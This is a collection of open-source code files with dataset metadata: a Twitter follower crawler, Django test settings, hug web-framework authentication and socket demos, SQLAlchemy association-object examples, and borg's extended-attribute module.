wait = 120
print "Retrieving the recent profile of user %d\n" % root
# First, try to get the recent profile settings of the user
try:
v = twitter.get('users/show', {"user_id": root})
print v['screen_name'], v['name'], json_encode(v)
post_data = {"user_id": json_encode([root]), "v": json_encode([v]), "auth_user_id": auth_user_id, "auth_password": auth_password}
print post_data
post_response = requests.post(url=app_root_url + '/profiles/store', data=post_data)
# post_response = requests.post(url=app_root_url + '/user/store', data={"user_id": root, "v": v})
except TwythonError as e:
print e
print "Error while fetching user profile from twitter, quitting ..."
key_store.release_access_tokens(access_tokens)
return e
if v['protected']:
post_data = {"user_id": root, "isProtected": 1, "auth_user_id": auth_user_id, "auth_password": auth_password}
post_response = requests.post(url=app_root_url+'/scheduler/reportProtectedUserid', data=post_data)
print "Reported User %d as having a Protected Account" % root
key_store.release_access_tokens(access_tokens)
else:
print "Retrieving %s of user %d\n" % (fof, root)
while 1:
# Check if we still have some bandwidth available
while remain<=0:
v = twitter.get('application/rate_limit_status', {"resources": fof})
remain = v["resources"][fof]["/" + fof + "/ids"]["remaining"]
if remain>0:
break
print "Waiting... Twitter API rate limit reached\n"
time.sleep(wait)
try:
S = twitter.get(fof + '/ids', {'user_id': root, 'cursor': cur})
# We count the number of remaining requests to the Twitter API
remain = remain - 1
IDS = IDS + S["ids"]
# SS = SS.append(S)
print "Total number of %s ID's retrieved so far: %d" % (fof, len(IDS))
cur = S["next_cursor"]
if cur==0:
break
except TwythonError as e:
print e
success = False
print "Error while fetching data from Twitter API"
break
key_store.release_access_tokens(access_tokens)
print "IDS retrieved: "
print IDS
if success:
post_data = {"user_id": root, "ids": json_encode(IDS),"auth_user_id":auth_user_id, "auth_password": auth_password}
post_response = requests.post(url=app_root_url + '/' + fof + '/ids/store', data=post_data)
print "%s" % post_response.content
return post_response.content
else:
post_data = {"user_id": root, "isProtected": 1, "auth_user_id":auth_user_id, "auth_password": auth_password}
post_response = requests.post(url=app_root_url+'/scheduler/reportProtectedUserid', data=post_data)
print "Reported User as having a Protected Account %d" % root
return post_response.content
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Direnaj Friends/Followers Crawler')
parser.add_argument('-f', '--fof', choices=["friends", "followers"], help='("friends"|"followers")', default="followers")
parser.add_argument('-u', '--user_id', help='the user id', type=int, default=0)
parser.add_argument('-N', '--iteration', help='number of requests', type=int, default=1)
args = parser.parse_args()
fof = args.fof
root = int(args.user_id)
N = int(args.iteration)
if root==0:
for i in range(N):
print i
# Get from scheduler
get_response = requests.get(url=app_root_url+'/scheduler/suggestUseridToGet_' + fof)
root = int(get_response.content)
if root==0:
#root = 50354388; # koray
root = 461494325; # Taylan
#root = 505670972; # Cem Say
#root = 483121138; # meltem
#root = 230412751; # Cengiz
#root = 636874348; # Pinar Selek
#root = 382081201; # Tolga Tuzun
#root = 745174243; # Sarp Maden
drnj_graph_crawler(fof, root)
else:
print "Ignoring N"
drnj_graph_crawler(fof, root)
| {
"repo_name": "boun-cmpe-soslab/drenaj",
"path": "drenaj/client/workers/twitter_api_getfollowers.py",
"copies": "1",
"size": "6376",
"license": "mit",
"hash": -8799007569239333000,
"line_mean": 35.8554913295,
"line_max": 137,
"alpha_frac": 0.6046110414,
"autogenerated": false,
"ratio": 3.491785323110624,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4596396364510624,
"avg_score": null,
"num_lines": null
} |
"""A basic database set-up for Travis CI.
The set-up uses the 'TRAVIS' (== True) environment variable on Travis
to detect the session, and changes the default database accordingly.
Be mindful of where you place this code, as you may accidentally
assign the default database to another configuration later in your code.
"""
import os
if 'TRAVIS' in os.environ:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'travis_ci_test',
'USER': 'postgres',
'PASSWORD': '',
'HOST': 'localhost',
'PORT': '',
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'develop',
'USER': 'develop',
'PASSWORD': 'develop',
'HOST': 'localhost',
'PORT': '',
}
}
SECRET_KEY = 'qwerty?'
INSTALLED_APPS = (
'amqp_2phase',
'tests',
)
import django
django.setup() | {
"repo_name": "cloud-taxi/django-amqp-2phase",
"path": "tests/settings.py",
"copies": "1",
"size": "1061",
"license": "bsd-3-clause",
"hash": 3188259280762269000,
"line_mean": 23.1363636364,
"line_max": 72,
"alpha_frac": 0.5353440151,
"autogenerated": false,
"ratio": 3.789285714285714,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4824629729385714,
"avg_score": null,
"num_lines": null
} |
"""A basic example of authentication requests within a hug API"""
import hug
import jwt
# Several authenticators are included in hug/authentication.py. These functions
# accept a verify_user function, which can be either an included function (such
# as the basic username/password function demonstrated below), or logic of your
# own. Verification functions return an object to store in the request context
# on successful authentication. Naturally, this is a trivial demo, and a much
# more robust verification function is recommended. This is for strictly
# illustrative purposes.
authentication = hug.authentication.basic(hug.authentication.verify("User1", "mypassword"))
@hug.get("/public")
def public_api_call():
return "Needs no authentication"
# Note that the logged in user can be accessed via a built-in directive.
# Directives can provide computed input parameters via an abstraction
# layer so as not to clutter your API functions with access to the raw
# request object.
@hug.get("/authenticated", requires=authentication)
def basic_auth_api_call(user: hug.directives.user):
return "Successfully authenticated with user: {0}".format(user)
# Here is a slightly less trivial example of how authentication might
# look in an API that uses keys.
# First, the user object stored in the context need not be a string,
# but can be any Python object.
class APIUser(object):
"""A minimal example of a rich User object"""
def __init__(self, user_id, api_key):
self.user_id = user_id
self.api_key = api_key
def api_key_verify(api_key):
magic_key = "5F00832B-DE24-4CAF-9638-C10D1C642C6C" # Obviously, this would hit your database
if api_key == magic_key:
# Success!
return APIUser("user_foo", api_key)
else:
# Invalid key
return None
api_key_authentication = hug.authentication.api_key(api_key_verify)
@hug.get("/key_authenticated", requires=api_key_authentication) # noqa
def basic_auth_api_call(user: hug.directives.user):
return "Successfully authenticated with user: {0}".format(user.user_id)
def token_verify(token):
secret_key = "super-secret-key-please-change"
try:
return jwt.decode(token, secret_key, algorithm="HS256")
except jwt.DecodeError:
return False
token_key_authentication = hug.authentication.token(token_verify)
@hug.get("/token_authenticated", requires=token_key_authentication) # noqa
def token_auth_call(user: hug.directives.user):
return "You are user: {0} with data {1}".format(user["user"], user["data"])
@hug.post("/token_generation") # noqa
def token_gen_call(username, password):
"""Authenticate and return a token"""
secret_key = "super-secret-key-please-change"
mockusername = "User2"
mockpassword = "Mypassword"
if mockpassword == password and mockusername == username: # This is an example. Don't do that.
return {
"token": jwt.encode({"user": username, "data": "mydata"}, secret_key, algorithm="HS256")
}
return "Invalid username and/or password for user: {0}".format(username)
| {
"repo_name": "timothycrosley/hug",
"path": "examples/authentication.py",
"copies": "1",
"size": "3104",
"license": "mit",
"hash": 7195108274195020000,
"line_mean": 35.0930232558,
"line_max": 100,
"alpha_frac": 0.7152061856,
"autogenerated": false,
"ratio": 3.656065959952886,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4871272145552886,
"avg_score": null,
"num_lines": null
} |
'''A basic example of authentication requests within a hug API'''
import hug
import jwt
# Several authenticators are included in hug/authentication.py. These functions
# accept a verify_user function, which can be either an included function (such
# as the basic username/password function demonstrated below), or logic of your
# own. Verification functions return an object to store in the request context
# on successful authentication. Naturally, this is a trivial demo, and a much
# more robust verification function is recommended. This is for strictly
# illustrative purposes.
authentication = hug.authentication.basic(hug.authentication.verify('User1', 'mypassword'))
@hug.get('/public')
def public_api_call():
return "Needs no authentication"
# Note that the logged in user can be accessed via a built-in directive.
# Directives can provide computed input parameters via an abstraction
# layer so as not to clutter your API functions with access to the raw
# request object.
@hug.get('/authenticated', requires=authentication)
def basic_auth_api_call(user: hug.directives.user):
return 'Successfully authenticated with user: {0}'.format(user)
# Here is a slightly less trivial example of how authentication might
# look in an API that uses keys.
# First, the user object stored in the context need not be a string,
# but can be any Python object.
class APIUser(object):
"""A minimal example of a rich User object"""
def __init__(self, user_id, api_key):
self.user_id = user_id
self.api_key = api_key
def api_key_verify(api_key):
magic_key = '5F00832B-DE24-4CAF-9638-C10D1C642C6C' # Obviously, this would hit your database
if api_key == magic_key:
# Success!
return APIUser('user_foo', api_key)
else:
# Invalid key
return None
api_key_authentication = hug.authentication.api_key(api_key_verify)
@hug.get('/key_authenticated', requires=api_key_authentication) # noqa
def basic_auth_api_call(user: hug.directives.user):
return 'Successfully authenticated with user: {0}'.format(user.user_id)
def token_verify(token):
secret_key = 'super-secret-key-please-change'
try:
return jwt.decode(token, secret_key, algorithm='HS256')
except jwt.DecodeError:
return False
token_key_authentication = hug.authentication.token(token_verify)
@hug.get('/token_authenticated', requires=token_key_authentication) # noqa
def token_auth_call(user: hug.directives.user):
return 'You are user: {0} with data {1}'.format(user['user'], user['data'])
@hug.post('/token_generation') # noqa
def token_gen_call(username, password):
"""Authenticate and return a token"""
secret_key = 'super-secret-key-please-change'
mockusername = 'User2'
mockpassword = 'Mypassword'
if mockpassword == password and mockusername == username: # This is an example. Don't do that.
return {"token" : jwt.encode({'user': username, 'data': 'mydata'}, secret_key, algorithm='HS256')}
return 'Invalid username and/or password for user: {0}'.format(username)
| {
"repo_name": "MuhammadAlkarouri/hug",
"path": "examples/authentication.py",
"copies": "1",
"size": "3082",
"license": "mit",
"hash": -7835600686454642000,
"line_mean": 35.6904761905,
"line_max": 106,
"alpha_frac": 0.720311486,
"autogenerated": false,
"ratio": 3.6473372781065088,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.48676487641065086,
"avg_score": null,
"num_lines": null
} |
"""A basic example of using hug.use.Socket to return data from raw sockets"""
import hug
import socket
import struct
import time
http_socket = hug.use.Socket(connect_to=('www.google.com', 80), proto='tcp', pool=4, timeout=10.0)
ntp_service = hug.use.Socket(connect_to=('127.0.0.1', 123), proto='udp', pool=4, timeout=10.0)
EPOCH_START = 2208988800
@hug.get()
def get_time():
"""Get time from a locally running NTP server"""
time_request = '\x1b' + 47 * '\0'
now = struct.unpack("!12I", ntp_service.request(time_request, timeout=5.0).data.read())[10]
return time.ctime(now - EPOCH_START)
@hug.get()
def reverse_http_proxy(length: int=100):
"""Simple reverse http proxy function that returns data/html from another http server (via sockets)
only drawback is the peername is static, and currently does not support being changed.
Example: curl localhost:8000/reverse_http_proxy?length=400"""
http_request = """
GET / HTTP/1.0\r\n\r\n
Host: www.google.com\r\n\r\n
\r\n\r\n
"""
return http_socket.request(http_request, timeout=5.0).data.read()[0:length]
| {
"repo_name": "MuhammadAlkarouri/hug",
"path": "examples/use_socket.py",
"copies": "1",
"size": "1092",
"license": "mit",
"hash": -7666298879065699000,
"line_mean": 32.0909090909,
"line_max": 103,
"alpha_frac": 0.6923076923,
"autogenerated": false,
"ratio": 2.9917808219178084,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4184088514217808,
"avg_score": null,
"num_lines": null
} |
"""A basic example of using hug.use.Socket to return data from raw sockets"""
import hug
import socket
import struct
import time
http_socket = hug.use.Socket(connect_to=("www.google.com", 80), proto="tcp", pool=4, timeout=10.0)
ntp_service = hug.use.Socket(connect_to=("127.0.0.1", 123), proto="udp", pool=4, timeout=10.0)
EPOCH_START = 2208988800
@hug.get()
def get_time():
"""Get time from a locally running NTP server"""
time_request = "\x1b" + 47 * "\0"
now = struct.unpack("!12I", ntp_service.request(time_request, timeout=5.0).data.read())[10]
return time.ctime(now - EPOCH_START)
@hug.get()
def reverse_http_proxy(length: int = 100):
"""Simple reverse http proxy function that returns data/html from another http server (via sockets)
only drawback is the peername is static, and currently does not support being changed.
Example: curl localhost:8000/reverse_http_proxy?length=400"""
http_request = """
GET / HTTP/1.0\r\n\r\n
Host: www.google.com\r\n\r\n
\r\n\r\n
"""
return http_socket.request(http_request, timeout=5.0).data.read()[0:length]
| {
"repo_name": "timothycrosley/hug",
"path": "examples/use_socket.py",
"copies": "1",
"size": "1096",
"license": "mit",
"hash": -845939506402359700,
"line_mean": 30.3142857143,
"line_max": 103,
"alpha_frac": 0.6897810219,
"autogenerated": false,
"ratio": 2.9945355191256833,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.41843165410256833,
"avg_score": null,
"num_lines": null
} |
"""A basic example of using the association object pattern.
The association object pattern is a form of many-to-many which
associates additional data with each association between parent/child.
The example illustrates an "order", referencing a collection
of "items", with a particular price paid associated with each "item".
"""
from datetime import datetime
from sqlalchemy import (create_engine, MetaData, Table, Column, Integer,
String, DateTime, Float, ForeignKey, and_)
from sqlalchemy.orm import mapper, relationship, Session
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()
class Order(Base):
__tablename__ = 'order'
order_id = Column(Integer, primary_key=True)
customer_name = Column(String(30), nullable=False)
order_date = Column(DateTime, nullable=False, default=datetime.now())
order_items = relationship("OrderItem", cascade="all, delete-orphan",
backref='order')
def __init__(self, customer_name):
self.customer_name = customer_name
class Item(Base):
__tablename__ = 'item'
item_id = Column(Integer, primary_key=True)
description = Column(String(30), nullable=False)
price = Column(Float, nullable=False)
def __init__(self, description, price):
self.description = description
self.price = price
def __repr__(self):
return 'Item(%r, %r)' % (
self.description, self.price
)
class OrderItem(Base):
__tablename__ = 'orderitem'
order_id = Column(Integer, ForeignKey('order.order_id'), primary_key=True)
item_id = Column(Integer, ForeignKey('item.item_id'), primary_key=True)
price = Column(Float, nullable=False)
def __init__(self, item, price=None):
self.item = item
self.price = price or item.price
item = relationship(Item, lazy='joined')
if __name__ == '__main__':
engine = create_engine('sqlite://')
Base.metadata.create_all(engine)
session = Session(engine)
# create catalog
tshirt, mug, hat, crowbar = (
Item('SA T-Shirt', 10.99),
Item('SA Mug', 6.50),
Item('SA Hat', 8.99),
Item('MySQL Crowbar', 16.99)
)
session.add_all([tshirt, mug, hat, crowbar])
session.commit()
# create an order
order = Order('john smith')
# add three OrderItem associations to the Order and save
order.order_items.append(OrderItem(mug))
order.order_items.append(OrderItem(crowbar, 10.99))
order.order_items.append(OrderItem(hat))
session.add(order)
session.commit()
# query the order, print items
order = session.query(Order).filter_by(customer_name='john smith').one()
print [(order_item.item.description, order_item.price)
for order_item in order.order_items]
# print customers who bought 'MySQL Crowbar' on sale
q = session.query(Order).join('order_items', 'item')
q = q.filter(and_(Item.description == 'MySQL Crowbar',
Item.price > OrderItem.price))
print [order.customer_name for order in q]
| {
"repo_name": "ioram7/keystone-federado-pgid2013",
"path": "build/sqlalchemy/examples/association/basic_association.py",
"copies": "2",
"size": "3088",
"license": "apache-2.0",
"hash": 273850825416834020,
"line_mean": 31.8510638298,
"line_max": 78,
"alpha_frac": 0.6544689119,
"autogenerated": false,
"ratio": 3.743030303030303,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.5397499214930304,
"avg_score": null,
"num_lines": null
} |
"""A basic example of using the association object pattern.
The association object pattern is a richer form of a many-to-many
relationship.
The model will be an ecommerce example. We will have an Order, which
represents a set of Items purchased by a user. Each Item has a price.
However, the Order must store its own price for each Item, representing
the price paid by the user for that particular order, which is independent
of the price on each Item (since those can change).
"""
from datetime import datetime
from sqlalchemy import (create_engine, MetaData, Table, Column, Integer,
String, DateTime, Numeric, ForeignKey, and_)
from sqlalchemy.orm import mapper, relation, create_session
# Uncomment these to watch database activity.
#import logging
#logging.basicConfig(format='%(message)s')
#logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)
engine = create_engine('sqlite:///')
metadata = MetaData(engine)
orders = Table('orders', metadata,
Column('order_id', Integer, primary_key=True),
Column('customer_name', String(30), nullable=False),
Column('order_date', DateTime, nullable=False, default=datetime.now()),
)
items = Table('items', metadata,
Column('item_id', Integer, primary_key=True),
Column('description', String(30), nullable=False),
Column('price', Numeric(8, 2), nullable=False)
)
orderitems = Table('orderitems', metadata,
Column('order_id', Integer, ForeignKey('orders.order_id'),
primary_key=True),
Column('item_id', Integer, ForeignKey('items.item_id'),
primary_key=True),
Column('price', Numeric(8, 2), nullable=False)
)
metadata.create_all()
class Order(object):
def __init__(self, customer_name):
self.customer_name = customer_name
class Item(object):
def __init__(self, description, price):
self.description = description
self.price = price
def __repr__(self):
return 'Item(%s, %s)' % (repr(self.description), repr(self.price))
class OrderItem(object):
def __init__(self, item, price=None):
self.item = item
self.price = price or item.price
mapper(Order, orders, properties={
'order_items': relation(OrderItem, cascade="all, delete-orphan",
backref='order')
})
mapper(Item, items)
mapper(OrderItem, orderitems, properties={
'item': relation(Item, lazy=False)
})
session = create_session()
# create our catalog
session.add(Item('SA T-Shirt', 10.99))
session.add(Item('SA Mug', 6.50))
session.add(Item('SA Hat', 8.99))
session.add(Item('MySQL Crowbar', 16.99))
session.flush()
# function to return items from the DB
def item(name):
return session.query(Item).filter_by(description=name).one()
# create an order
order = Order('john smith')
# add three OrderItem associations to the Order and save
order.order_items.append(OrderItem(item('SA Mug')))
order.order_items.append(OrderItem(item('MySQL Crowbar'), 10.99))
order.order_items.append(OrderItem(item('SA Hat')))
session.add(order)
session.flush()
session.expunge_all()
# query the order, print items
order = session.query(Order).filter_by(customer_name='john smith').one()
print [(order_item.item.description, order_item.price)
for order_item in order.order_items]
# print customers who bought 'MySQL Crowbar' on sale
q = session.query(Order).join(['order_items', 'item'])
q = q.filter(and_(Item.description == 'MySQL Crowbar',
Item.price > OrderItem.price))
print [order.customer_name for order in q]
| {
"repo_name": "obeattie/sqlalchemy",
"path": "examples/association/basic_association.py",
"copies": "1",
"size": "3533",
"license": "mit",
"hash": -1059198587173019900,
"line_mean": 31.712962963,
"line_max": 75,
"alpha_frac": 0.694310784,
"autogenerated": false,
"ratio": 3.5940996948118005,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.9747602688569663,
"avg_score": 0.008161558048427525,
"num_lines": 108
} |
"""A basic extended attributes (xattr) implementation for Linux and MacOS X
"""
import errno
import os
import sys
import tempfile
from ctypes import CDLL, create_string_buffer, c_ssize_t, c_size_t, c_char_p, c_int, c_uint32, get_errno
from ctypes.util import find_library
from .logger import create_logger
logger = create_logger()
def is_enabled(path=None):
"""Determine if xattr is enabled on the filesystem
"""
with tempfile.NamedTemporaryFile(dir=path, prefix='borg-tmp') as fd:
try:
setxattr(fd.fileno(), 'user.name', b'value')
except OSError:
return False
return getxattr(fd.fileno(), 'user.name') == b'value'
def get_all(path, follow_symlinks=True):
try:
return dict((name, getxattr(path, name, follow_symlinks=follow_symlinks))
for name in listxattr(path, follow_symlinks=follow_symlinks))
except OSError as e:
if e.errno in (errno.ENOTSUP, errno.EPERM):
return {}
libc_name = find_library('c')
if libc_name is None:
# find_library didn't work, maybe we are on some minimal system that misses essential
# tools used by find_library, like ldconfig, gcc/cc, objdump.
# so we can only try some "usual" names for the C library:
if sys.platform.startswith('linux'):
libc_name = 'libc.so.6'
elif sys.platform.startswith(('freebsd', 'netbsd')):
libc_name = 'libc.so'
elif sys.platform == 'darwin':
libc_name = 'libc.dylib'
else:
msg = "Can't find C library. No fallback known. Try installing ldconfig, gcc/cc or objdump."
logger.error(msg)
raise Exception(msg)
try:
libc = CDLL(libc_name, use_errno=True)
except OSError as e:
msg = "Can't find C library [%s]. Try installing ldconfig, gcc/cc or objdump." % e
logger.error(msg)
raise Exception(msg)
def _check(rv, path=None):
if rv < 0:
raise OSError(get_errno(), path)
return rv
if sys.platform.startswith('linux'): # pragma: linux only
libc.llistxattr.argtypes = (c_char_p, c_char_p, c_size_t)
libc.llistxattr.restype = c_ssize_t
libc.flistxattr.argtypes = (c_int, c_char_p, c_size_t)
libc.flistxattr.restype = c_ssize_t
libc.lsetxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_int)
libc.lsetxattr.restype = c_int
libc.fsetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_int)
libc.fsetxattr.restype = c_int
libc.lgetxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t)
libc.lgetxattr.restype = c_ssize_t
libc.fgetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t)
libc.fgetxattr.restype = c_ssize_t
def listxattr(path, *, follow_symlinks=True):
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.flistxattr
elif follow_symlinks:
func = libc.listxattr
else:
func = libc.llistxattr
n = _check(func(path, None, 0), path)
if n == 0:
return []
namebuf = create_string_buffer(n)
n2 = _check(func(path, namebuf, n), path)
if n2 != n:
raise Exception('listxattr failed')
return [os.fsdecode(name) for name in namebuf.raw.split(b'\0')[:-1] if not name.startswith(b'system.posix_acl_')]
def getxattr(path, name, *, follow_symlinks=True):
name = os.fsencode(name)
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.fgetxattr
elif follow_symlinks:
func = libc.getxattr
else:
func = libc.lgetxattr
n = _check(func(path, name, None, 0))
if n == 0:
return
valuebuf = create_string_buffer(n)
n2 = _check(func(path, name, valuebuf, n), path)
if n2 != n:
raise Exception('getxattr failed')
return valuebuf.raw
def setxattr(path, name, value, *, follow_symlinks=True):
name = os.fsencode(name)
value = value and os.fsencode(value)
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.fsetxattr
elif follow_symlinks:
func = libc.setxattr
else:
func = libc.lsetxattr
_check(func(path, name, value, len(value) if value else 0, 0), path)
elif sys.platform == 'darwin': # pragma: darwin only
libc.listxattr.argtypes = (c_char_p, c_char_p, c_size_t, c_int)
libc.listxattr.restype = c_ssize_t
libc.flistxattr.argtypes = (c_int, c_char_p, c_size_t)
libc.flistxattr.restype = c_ssize_t
libc.setxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.setxattr.restype = c_int
libc.fsetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.fsetxattr.restype = c_int
libc.getxattr.argtypes = (c_char_p, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.getxattr.restype = c_ssize_t
libc.fgetxattr.argtypes = (c_int, c_char_p, c_char_p, c_size_t, c_uint32, c_int)
libc.fgetxattr.restype = c_ssize_t
XATTR_NOFOLLOW = 0x0001
def listxattr(path, *, follow_symlinks=True):
func = libc.listxattr
flags = 0
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.flistxattr
elif not follow_symlinks:
flags = XATTR_NOFOLLOW
n = _check(func(path, None, 0, flags), path)
if n == 0:
return []
namebuf = create_string_buffer(n)
n2 = _check(func(path, namebuf, n, flags), path)
if n2 != n:
raise Exception('listxattr failed')
return [os.fsdecode(name) for name in namebuf.raw.split(b'\0')[:-1]]
def getxattr(path, name, *, follow_symlinks=True):
name = os.fsencode(name)
func = libc.getxattr
flags = 0
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.fgetxattr
elif not follow_symlinks:
flags = XATTR_NOFOLLOW
n = _check(func(path, name, None, 0, 0, flags))
if n == 0:
return
valuebuf = create_string_buffer(n)
n2 = _check(func(path, name, valuebuf, n, 0, flags), path)
if n2 != n:
raise Exception('getxattr failed')
return valuebuf.raw
def setxattr(path, name, value, *, follow_symlinks=True):
name = os.fsencode(name)
value = value and os.fsencode(value)
func = libc.setxattr
flags = 0
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.fsetxattr
elif not follow_symlinks:
flags = XATTR_NOFOLLOW
_check(func(path, name, value, len(value) if value else 0, 0, flags), path)
elif sys.platform.startswith('freebsd'): # pragma: freebsd only
EXTATTR_NAMESPACE_USER = 0x0001
libc.extattr_list_fd.argtypes = (c_int, c_int, c_char_p, c_size_t)
libc.extattr_list_fd.restype = c_ssize_t
libc.extattr_list_link.argtypes = (c_char_p, c_int, c_char_p, c_size_t)
libc.extattr_list_link.restype = c_ssize_t
libc.extattr_list_file.argtypes = (c_char_p, c_int, c_char_p, c_size_t)
libc.extattr_list_file.restype = c_ssize_t
libc.extattr_get_fd.argtypes = (c_int, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_fd.restype = c_ssize_t
libc.extattr_get_link.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_link.restype = c_ssize_t
libc.extattr_get_file.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_get_file.restype = c_ssize_t
libc.extattr_set_fd.argtypes = (c_int, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_fd.restype = c_int
libc.extattr_set_link.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_link.restype = c_int
libc.extattr_set_file.argtypes = (c_char_p, c_int, c_char_p, c_char_p, c_size_t)
libc.extattr_set_file.restype = c_int
def listxattr(path, *, follow_symlinks=True):
ns = EXTATTR_NAMESPACE_USER
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.extattr_list_fd
elif follow_symlinks:
func = libc.extattr_list_file
else:
func = libc.extattr_list_link
n = _check(func(path, ns, None, 0), path)
if n == 0:
return []
namebuf = create_string_buffer(n)
n2 = _check(func(path, ns, namebuf, n), path)
if n2 != n:
raise Exception('listxattr failed')
names = []
mv = memoryview(namebuf.raw)
while mv:
length = mv[0]
names.append(os.fsdecode(bytes(mv[1:1 + length])))
mv = mv[1 + length:]
return names
def getxattr(path, name, *, follow_symlinks=True):
name = os.fsencode(name)
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.extattr_get_fd
elif follow_symlinks:
func = libc.extattr_get_file
else:
func = libc.extattr_get_link
n = _check(func(path, EXTATTR_NAMESPACE_USER, name, None, 0))
if n == 0:
return
valuebuf = create_string_buffer(n)
n2 = _check(func(path, EXTATTR_NAMESPACE_USER, name, valuebuf, n), path)
if n2 != n:
raise Exception('getxattr failed')
return valuebuf.raw
def setxattr(path, name, value, *, follow_symlinks=True):
name = os.fsencode(name)
value = value and os.fsencode(value)
if isinstance(path, str):
path = os.fsencode(path)
if isinstance(path, int):
func = libc.extattr_set_fd
elif follow_symlinks:
func = libc.extattr_set_file
else:
func = libc.extattr_set_link
_check(func(path, EXTATTR_NAMESPACE_USER, name, value, len(value) if value else 0), path)
else: # pragma: unknown platform only
def listxattr(path, *, follow_symlinks=True):
return []
def getxattr(path, name, *, follow_symlinks=True):
pass
def setxattr(path, name, value, *, follow_symlinks=True):
pass
| {
"repo_name": "mhubig/borg",
"path": "borg/xattr.py",
"copies": "1",
"size": "10476",
"license": "bsd-3-clause",
"hash": 5725426914976233000,
"line_mean": 36.6834532374,
"line_max": 121,
"alpha_frac": 0.5950744559,
"autogenerated": false,
"ratio": 3.145945945945946,
"config_test": false,
"has_no_keywords": false,
"few_assignments": false,
"quality_score": 0.4241020401845946,
"avg_score": null,
"num_lines": null
} |
"""A basic extended attributes (xattr) implementation for Linux, FreeBSD and MacOS X."""
import errno
import os
import re
import subprocess
import sys
import tempfile
from ctypes import CDLL, create_string_buffer, c_ssize_t, c_size_t, c_char_p, c_int, c_uint32, get_errno
from ctypes.util import find_library
from distutils.version import LooseVersion
from .helpers import Buffer
try:
ENOATTR = errno.ENOATTR
except AttributeError:
# on some platforms, ENOATTR is missing, use ENODATA there
ENOATTR = errno.ENODATA
buffer = Buffer(create_string_buffer, limit=2**24)
def is_enabled(path=None):
"""Determine if xattr is enabled on the filesystem
"""
with tempfile.NamedTemporaryFile(dir=path, prefix='borg-tmp') as fd:
try:
setxattr(fd.fileno(), 'user.name', b'value')
except OSError:
return False
return getxattr(fd.fileno(), 'user.name') == b'value'
def get_all(path, follow_symlinks=True):
"""
Return all extended attributes on *path* as a mapping.
*path* can either be a path (str or bytes) or an open file descriptor (int).
*follow_symlinks* indicates whether symlinks should be followed
and only applies when *path* is not an open file descriptor.
The returned mapping maps xattr names (str) to values (bytes or None).
None indicates, as a xattr value, an empty value, i.e. a value of length zero.
"""
try:
result = {}
names = listxattr(path, follow_symlinks=follow_symlinks)
for name in names:
try:
result[name] = getxattr(path, name, follow_symlinks=follow_symlinks)
except OSError as e:
# if we get ENOATTR, a race has happened: xattr names were deleted after list.
# we just ignore the now missing ones. if you want consistency, do snapshots.
if e.errno != ENOATTR:
raise
return result
except OSError as e:
if e.errno in (errno.ENOTSUP, errno.EPERM):
return {}
libc_name = find_library('c')
if libc_name is None:
# find_library didn't work, maybe we are on some minimal system that misses essential
# tools used by find_library, like ldconfig, gcc/cc, objdump.
# so we can only try some "usual" names for the C library:
if sys.platform.startswith('linux'):
libc_name = 'libc.so.6'
elif sys.platform.startswith(('freebsd', 'netbsd')):
libc_name = 'libc.so'
elif sys.platform == 'darwin':
libc_name = 'libc.dylib'
else:
msg = "Can't find C library. No fallback known. Try installing ldconfig, gcc/cc or objdump."
print(msg, file=sys.stderr) # logger isn't initialized at this stage
raise Exception(msg)
# If we are running with fakeroot on Linux, then use the xattr functions of fakeroot. This is needed by
# the 'test_extract_capabilities' test, but also allows xattrs to work with fakeroot on Linux in normal use.
# TODO: Check whether fakeroot supports xattrs on all platforms supported below.
# TODO: If that's the case then we can make Borg fakeroot-xattr-compatible on these as well.
XATTR_FAKEROOT = False
if sys.platform.startswith('linux'):
LD_PRELOAD = os.environ.get('LD_PRELOAD', '')
preloads = re.split("[ :]", LD_PRELOAD)
for preload in preloads:
if preload.startswith("libfakeroot"):
fakeroot_version = LooseVersion(subprocess.check_output(['fakeroot', '-v']).decode('ascii').split()[-1])
if fakeroot_version >= LooseVersion("1.20.2"):
# 1.20.2 has been confirmed to have xattr support
# 1.18.2 has been confirmed not to have xattr support
# Versions in-between are unknown
libc_name = preload
XATTR_FAKEROOT = True
break
try:
libc = CDLL(libc_name, use_errno=True)
except OSError as e:
msg = "Can't find C library [%s]. Try installing ldconfig, gcc/cc or objdump." % e
raise Exception(msg)
def split_string0(buf):
